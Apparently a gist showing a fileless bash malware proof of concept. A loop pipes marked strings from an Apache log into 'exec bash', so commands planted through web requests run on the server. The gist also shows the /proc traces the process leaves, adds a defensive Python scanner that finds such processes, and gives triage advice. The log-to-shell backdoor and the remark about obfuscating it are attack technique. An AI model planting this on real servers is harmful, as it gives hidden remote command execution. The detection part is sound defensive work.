Last active: September 19, 2022 18:26
Fileless bash malware PoC
$ echo "while :; do grep "BAH~" /var/log/apache2/interesting.log | cut -f 2 -d \"~\" | tr '_' ' '; done" | exec bash
$ wget --no-check-certificate 'https://interesting/?BAH~touch_/tmp/foo~'
root 10680 10679 0 21:27 pts/1 00:00:00 /bin/bash
root 11125 10680 17 21:27 pts/1 00:00:02 bash
$ ls /proc/11125/fd
total 0
dr-x------ 2 root root 0 Jun 28 21:27 .
dr-xr-xr-x 9 root root 0 Jun 28 21:27 ..
lr-x------ 1 root root 64 Jun 28 21:28 0 -> pipe:[290558013]
lrwx------ 1 root root 64 Jun 28 21:28 1 -> /dev/pts/1
lrwx------ 1 root root 64 Jun 28 21:27 2 -> /dev/pts/1
$ cat /proc/11125/cmdline
bash
cat /proc/11125/cwd
/root
Things like exec/disown/patterns/eval add some fun options for further obfuscation...
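The forensic signature the session above leaves behind is small but consistent: /proc/PID/cmdline is a bare interpreter name with no script path, and fd 0 points at an anonymous pipe instead of a tty or a file, so nothing on disk corresponds to the running code. The scanner below, an added example that is not part of the gist, walks /proc looking for exactly that shape. The interpreter list and the flag handling are my own assumptions for the example; nothing about it is tied to the PoC's payload.

```python
"""Hunt for 'fileless' interpreter processes on a Linux host (added example).

Flags processes whose cmdline is a bare interpreter (no script path, no -c/-e
inline program) and whose stdin is an anonymous pipe or socket, i.e. the shape
left behind by `... | exec bash`.
"""
import os
import re
from dataclasses import dataclass
from typing import List, Optional

# Interpreters that execute whatever arrives on stdin. Assumed list for this
# example; extend it for the interpreters present on your hosts.
INTERPRETERS = {"bash", "sh", "dash", "zsh", "ksh", "python", "python3", "perl"}

# readlink(/proc/<pid>/fd/0) for anonymous inodes looks like "pipe:[290558013]"
# or "socket:[12345]"; a tty or a file would be a real path instead.
ANON_STDIN = re.compile(r"^(pipe|socket):\[\d+\]$")


def is_fileless_interpreter(argv: List[str], stdin_target: Optional[str]) -> bool:
    """True when argv is a bare interpreter fed from a pipe or socket.

    argv is the NUL-split cmdline; stdin_target is the readlink of fd 0
    (None if it could not be read).
    """
    if not argv or stdin_target is None:
        return False
    if os.path.basename(argv[0]) not in INTERPRETERS:
        return False
    rest = argv[1:]
    # An inline program (-c / -e) is at least visible in cmdline; skip it here.
    if any(a in ("-c", "-e") for a in rest):
        return False
    # Any non-option argument is a script path, so the code has a file on disk.
    if any(not a.startswith("-") for a in rest):
        return False
    return bool(ANON_STDIN.match(stdin_target))


@dataclass
class Finding:
    pid: int
    ppid: int
    argv: List[str]
    stdin_target: str
    cwd: str


def read_cmdline(proc_root: str, pid: int) -> List[str]:
    with open(f"{proc_root}/{pid}/cmdline", "rb") as f:
        raw = f.read()
    return [a.decode(errors="replace") for a in raw.split(b"\0") if a]


def read_ppid(proc_root: str, pid: int) -> int:
    with open(f"{proc_root}/{pid}/status") as f:
        for line in f:
            if line.startswith("PPid:"):
                return int(line.split()[1])
    return 0


def scan_proc(proc_root: str = "/proc") -> List[Finding]:
    """Walk proc_root and return every process matching the fileless shape."""
    findings: List[Finding] = []
    if not os.path.isdir(proc_root):
        return findings  # not Linux, or procfs not mounted
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue
        pid = int(entry)
        try:
            argv = read_cmdline(proc_root, pid)
            stdin_target = os.readlink(f"{proc_root}/{pid}/fd/0")
            if is_fileless_interpreter(argv, stdin_target):
                findings.append(Finding(pid, read_ppid(proc_root, pid), argv,
                                        stdin_target,
                                        os.readlink(f"{proc_root}/{pid}/cwd")))
        except OSError:
            continue  # process exited mid-scan, or fds not readable (need root)
    return findings


if __name__ == "__main__":
    for f in scan_proc():
        print(f"pid={f.pid} ppid={f.ppid} argv={f.argv} "
              f"stdin={f.stdin_target} cwd={f.cwd}")
```

Run it as root, since /proc/PID/fd of other users' processes is not readable otherwise. Treat hits as triage leads rather than verdicts: a `curl ... | bash` installer or a CI step produces the same shape, so the parent PID and cwd in each finding are what tell the two apart. Since a piped script leaves no file to collect, capturing the process's memory or at least `/proc/PID/environ` and the parent's history before killing it is the only way to recover what actually ran.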
This PoC is nobbled, just in case anyone is confused. The point is the "| exec bash" rather than the payload specifics.